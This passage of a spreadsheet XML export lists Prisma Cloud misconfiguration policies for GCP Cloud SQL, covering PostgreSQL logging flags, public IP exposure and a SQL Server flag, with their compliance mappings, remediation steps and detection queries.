HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev4, Fedramp (Low), ACSC Information Security Manual (ISM), Fedramp (Low), CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, jneytchev-fedramp-low, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v.4.0.1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, Rehan, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS v3.0.0 (GCP) Level 1, SOC 2, NIST CSF v2.0, CIS v1.1.0 (GCP), APRA (CPS 234) Information Security, HIPAA, NIST CSF, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, PCI DSS v3.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2957" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2957" s="2" t="inlineStr"/>
      <c r="D2957" t="inlineStr"/>
      <c r="E2957" t="inlineStr"/>
      <c r="F2957" t="inlineStr"/>
      <c r="G2957" t="b">
        <v>1</v>
      </c>
      <c r="H29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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2957" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2957" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_disconnections is disabled</t>
        </is>
      </c>
      <c r="L2957" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2957" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2957" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2957" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2957" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2957" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2957" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2957" t="inlineStr"/>
      <c r="T2957" t="b">
        <v>0</v>
      </c>
      <c r="U2957" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2957" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2957" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL type SQL instances for which the log_disconnections database flag is disabled. Enabling the log_disconnections setting will create log entries at the end of each session which can be useful in troubleshooting issues and determine any unusual activity across a time period.</t>
        </is>
      </c>
      <c r="X2957" t="inlineStr">
        <is>
          <t>1. Login to GCP Console
2. Navigate to SQL
3. Click on the PostgreSQL instance ID for which you want to enable the database flag from the list
4. Click 'Edit'
NOTE: If the instance is stopped, You need to START instance first to edit the configurations, then Click on EDIT.
5. Go to the 'Flags' section under 'Configuration options'
6. To set a flag that has not been set on the instance before, click 'Add item', choose the flag 'log_disconnections' from the drop-down menu and set the value as 'on'.
7. If it is already set to 'off' for 'log_disconnections', from the drop-down menu set the value as 'on'
8. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-4
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-4</t>
        </is>
      </c>
      <c r="Y2957" t="inlineStr"/>
      <c r="Z2957" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains POSTGRES and (settings.databaseFlags[?(@.name=='log_disconnections')] does not exist or settings.databaseFlags[?(@.name=='log_disconnections')].value equals off)"
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2957" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2957" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2957" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-531-CKV_GCP_53</t>
        </is>
      </c>
      <c r="AD2957" t="b">
        <v>1</v>
      </c>
      <c r="AE2957" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2957" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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7" t="inlineStr">
        <is>
          <t>286e7808-c15c-4759-a0c4-759298ee7769</t>
        </is>
      </c>
      <c r="AI2957" t="inlineStr">
        <is>
          <t>05244425-d5d0-4055-a461-198000dd1b25</t>
        </is>
      </c>
      <c r="AJ2957" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2957" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2958">
      <c r="A2958" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.6, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, CIS Controls v7.1, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v8, PCI DSS v4.0, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, CRI Profile v1.2.1, TX-RAMP Level 2, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v.4.0.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS v1.2.0 (GCP), SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, CIS v1.1.0 (GCP), PCI DSS v4.0, ISO/IEC 27002:2013, CIS Controls v8.1, Rehan, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, PCI DSS v3.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2958" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2958" s="2" t="inlineStr"/>
      <c r="D2958" t="inlineStr"/>
      <c r="E2958" t="inlineStr"/>
      <c r="F2958" t="inlineStr"/>
      <c r="G2958" t="b">
        <v>1</v>
      </c>
      <c r="H29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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2958" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2958" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_temp_files is not set to 0</t>
        </is>
      </c>
      <c r="L2958" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2958" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2958" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2958" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2958" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2958" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2958" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2958" t="inlineStr"/>
      <c r="T2958" t="b">
        <v>0</v>
      </c>
      <c r="U2958" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2958" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2958" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_temp_files is not set to 0. The log_temp_files flag controls the logging of names and size of temporary files. Configuring log_temp_files to 0 causes all temporary file information to be logged, while positive values log only files whose size is greater than or equal to the specified number of kilobytes. A value of -1 disables temporary file information logging. If all temporary files are not logged, it may be more difficult to identify potential performance issues that may be either poor application coding or deliberate resource starvation attempts.</t>
        </is>
      </c>
      <c r="X2958" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
NOTE: If the instance is stopped, You need to START instance first to edit the configurations, then Click on EDIT.
5. If the flag has not been set on the instance, 
Under 'Configuration options', click on 'Add item' in 'Flags' section, choose the flag 'log_temp_files' from the drop-down menu and set the value as '0'
OR
If the flag has been set to other than 0, Under 'Configuration options', In 'Flags' section choose the flag 'log_temp_files' and set the value as '0'
6. Click Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-7
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-7</t>
        </is>
      </c>
      <c r="Y2958" t="inlineStr"/>
      <c r="Z2958" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains POSTGRES and (settings.databaseFlags[?(@.name=='log_temp_files')] does not exist or settings.databaseFlags[?(@.name=='log_temp_files')].value does not equal 0)"
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2958" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2958" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2958" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-541-CKV_GCP_56</t>
        </is>
      </c>
      <c r="AD2958" t="b">
        <v>1</v>
      </c>
      <c r="AE2958" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2958" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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8" t="inlineStr">
        <is>
          <t>2b9b082c-7e83-4695-92ab-8eca4c5dd4fd</t>
        </is>
      </c>
      <c r="AI2958" t="inlineStr">
        <is>
          <t>8ef39c42-81d4-4816-a402-fc5b1bbbc22b</t>
        </is>
      </c>
      <c r="AJ2958" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2958" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2959">
      <c r="A2959"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GDPR, CIS v1.2.0 (GCP), Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO/IEC 27001:2022, ISO 27002:2022, TX-RAMP Level 1, CRI Profile v1.2.1,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SOC 2, NIST CSF v2.0, HIPAA, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2959" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2959" s="2" t="inlineStr"/>
      <c r="D2959" t="inlineStr"/>
      <c r="E2959" t="inlineStr"/>
      <c r="F2959" t="inlineStr"/>
      <c r="G2959" t="b">
        <v>1</v>
      </c>
      <c r="H29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59" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2959" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2959" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_statement_stats is not set to off</t>
        </is>
      </c>
      <c r="L2959" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2959" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2959" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2959" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2959" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2959" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2959" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2959" t="inlineStr"/>
      <c r="T2959" t="b">
        <v>0</v>
      </c>
      <c r="U2959" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2959" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2959" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_statement_stats is not set to off. The log_statement_stats flag enables a crude profiling method for logging end-to-end performance statistics of a SQL query. This can be useful for troubleshooting but may increase the number of logs significantly and have performance overhead. It is recommended to set log_statement_stats as off.
Note:  The flag 'log_statement_stats' cannot be enabled with other
module statistics (log_parser_stats, log_planner_stats, log_executor_stats).</t>
        </is>
      </c>
      <c r="X2959" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance', click on 'ADD FLAG' in 'Flags' section, choose the flag 'log_statement_stats' from the drop-down menu and set the value as 'off'
OR
If the flag has been set to other than off, Under 'Customize your instance', In 'Flags' section choose the flag 'log_statement_stats' and set the value as 'off'
6. Click on 'DONE' and then 'SAVE' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-2-17
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-2-17</t>
        </is>
      </c>
      <c r="Y2959" t="inlineStr"/>
      <c r="Z2959" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "state equals RUNNABLE and databaseVersion contains POSTGRES and (settings.databaseFlags[*].name does not contain log_statement_stats or settings.databaseFlags[?any(name contains log_statement_stats and value contains on)] exists)"
{"category":"Logging","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2959" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2959" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2959" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-756-CKV2_GCP_17</t>
        </is>
      </c>
      <c r="AD2959" t="b">
        <v>1</v>
      </c>
      <c r="AE2959" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2959" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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59" t="inlineStr">
        <is>
          <t>dc45b7cd-27d4-41d2-a111-acedc0e5d48c</t>
        </is>
      </c>
      <c r="AI2959" t="inlineStr">
        <is>
          <t>ef360d7f-cd86-4c78-89f1-53c296853e2d</t>
        </is>
      </c>
      <c r="AJ2959" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2959" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2960">
      <c r="A2960" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, CSA CCM v.4.0.1, Rehan, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, HITRUST v.9.4.2 [Deprecated], CIS v1.2.0 (GCP), NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ITSG-33, ISO 27002:2022, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, Brazilian Data Protection Law (LGPD), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS Controls v8, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CIS v2.0.0 (GCP) Level 1, NIST CSF, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CIS v2.0.0 (GCP) Level 2, ISO/IEC 27001:2022, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, CIS Controls v7.1, Copy of New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v1.3.0 (GCP), CIS v1.1.0 (GCP), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, CSA CCM v.4.0.1, CIS v3.0.0 (GCP) Level 2, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2960" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2960" s="2" t="inlineStr"/>
      <c r="D2960" t="inlineStr"/>
      <c r="E2960" t="inlineStr"/>
      <c r="F2960" t="inlineStr"/>
      <c r="G2960" t="b">
        <v>1</v>
      </c>
      <c r="H29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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2960" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2960" t="inlineStr">
        <is>
          <t>GCP SQL database is assigned with public IP</t>
        </is>
      </c>
      <c r="L2960" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2960" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2960" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2960" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2960" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2960" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2960" t="inlineStr">
        <is>
          <t>ISM-1271</t>
        </is>
      </c>
      <c r="S2960" t="inlineStr"/>
      <c r="T2960" t="b">
        <v>0</v>
      </c>
      <c r="U2960" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2960" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2960" t="inlineStr">
        <is>
          <t>This policy identifies GCP SQL databases which are assigned with public IP.  To lower the organisation's attack surface, Cloud SQL databases should not have public IPs. Private IPs provide improved network security and lower latency for your application. It is recommended to configure Second Generation Sql instance to use private IPs instead of public IPs.</t>
        </is>
      </c>
      <c r="X2960" t="inlineStr">
        <is>
          <t>1. Login to GCP Console
2. Navigate to SQL
3. Click on the reported SQL instance, 
4. On overview page, click on 'EDIT' from top menu
5. Under 'Configuration options' Click on  'Connectivity'
6. From dropdown deselect 'Public IP' checkbox 
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2960" t="inlineStr"/>
      <c r="Z2960" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = backendType equals SECOND_GEN and ipAddresses[*].type contains PRIMARY</t>
        </is>
      </c>
      <c r="AA2960" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2960" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2960" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-551</t>
        </is>
      </c>
      <c r="AD2960" t="b">
        <v>1</v>
      </c>
      <c r="AE2960" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2960" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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0" t="inlineStr">
        <is>
          <t>4e58f169-5632-4b3c-9f8a-74348cf93957</t>
        </is>
      </c>
      <c r="AI2960" t="inlineStr">
        <is>
          <t>7e85ecdd-e58b-470f-b086-50928e8b44ce</t>
        </is>
      </c>
      <c r="AJ2960" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2960" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2961">
      <c r="A2961" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, PCI DSS v4.0, CSA CCM v.4.0.6, FFIEC, New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8, CIS v2.0.0 (GCP) Level 1, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, FFIEC, PCI DSS v4.0, CRI Profile v1.2.1, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, PCI DSS v4.0, PCI DSS v4.0, PCI DSS v4.0, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v4.0.12, FFIEC, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27001:2022, CIS v1.3.0 (GCP), ISO/IEC 27001:2022, CIS v1.2.0 (GCP), CRI Profile v1.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), ISO 27002:2022, CIS Controls v7.1, PCI DSS v4.0, Copy of CIS Controls v8, FFIEC, CIS v3.0.0 (GCP) Level 1</t>
        </is>
      </c>
      <c r="B2961" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2961" s="2" t="inlineStr"/>
      <c r="D2961" t="inlineStr"/>
      <c r="E2961" t="inlineStr"/>
      <c r="F2961" t="inlineStr"/>
      <c r="G2961" t="b">
        <v>1</v>
      </c>
      <c r="H29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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2961" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2961" t="inlineStr">
        <is>
          <t>GCP SQL server instance database flag user options is set</t>
        </is>
      </c>
      <c r="L2961" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2961" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2961" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2961" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2961" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2961" t="inlineStr">
        <is>
          <t>CIS Control 4</t>
        </is>
      </c>
      <c r="R2961" t="inlineStr">
        <is>
          <t>4.1</t>
        </is>
      </c>
      <c r="S2961" t="inlineStr"/>
      <c r="T2961" t="b">
        <v>0</v>
      </c>
      <c r="U2961" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2961" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2961" t="inlineStr">
        <is>
          <t>This policy identifies GCP SQL server instances fo which database flag user options is set. The user options option specifies global defaults for all users. A list of default query processing options is established for the duration of a user's work session. A user can override these defaults by using the SET statement. It is recommended that, user options database flag for SQL Server instance should not be configured.</t>
        </is>
      </c>
      <c r="X2961" t="inlineStr">
        <is>
          <t>1. Log in to the GCP console
2. Navigate SQL Instances page
3. Click on the reported SQL server instance
4. Click on EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance' section, go to 'Flags and parameters', go to the flag 'user options' and click on delete icon
6. Click on SAVE 
7. If 'Changes requires restart' pop-up appears, click on 'SAVE AND RESTART'</t>
        </is>
      </c>
      <c r="Y2961" t="inlineStr"/>
      <c r="Z2961" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = 'state equals RUNNABLE and databaseVersion contains SQLSERVER and settings.databaseFlags[*].name contains "user options"'</t>
        </is>
      </c>
      <c r="AA2961" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2961" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2961" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-771</t>
        </is>
      </c>
      <c r="AD2961" t="b">
        <v>1</v>
      </c>
      <c r="AE2961" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2961" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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1" t="inlineStr">
        <is>
          <t>7cefd0ab-99b8-4f69-b9f7-55b0db2f0a8f</t>
        </is>
      </c>
      <c r="AI2961" t="inlineStr">
        <is>
          <t>ebc8ff31-fcb0-43bf-a620-6484b1fab968</t>
        </is>
      </c>
      <c r="AJ2961" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2961" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2962">
      <c r="A2962" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.6, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CIS v1.3.0 (GCP), ITSG-33, CIS Controls v7.1, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CIS v2.0.0 (GCP) Level 1, CIS v1.2.0 (GCP), kashan ACSC Information Security Manual (ISM), CIS Controls v8, PCI DSS v4.0, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, CRI Profile v1.2.1, TX-RAMP Level 2, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework 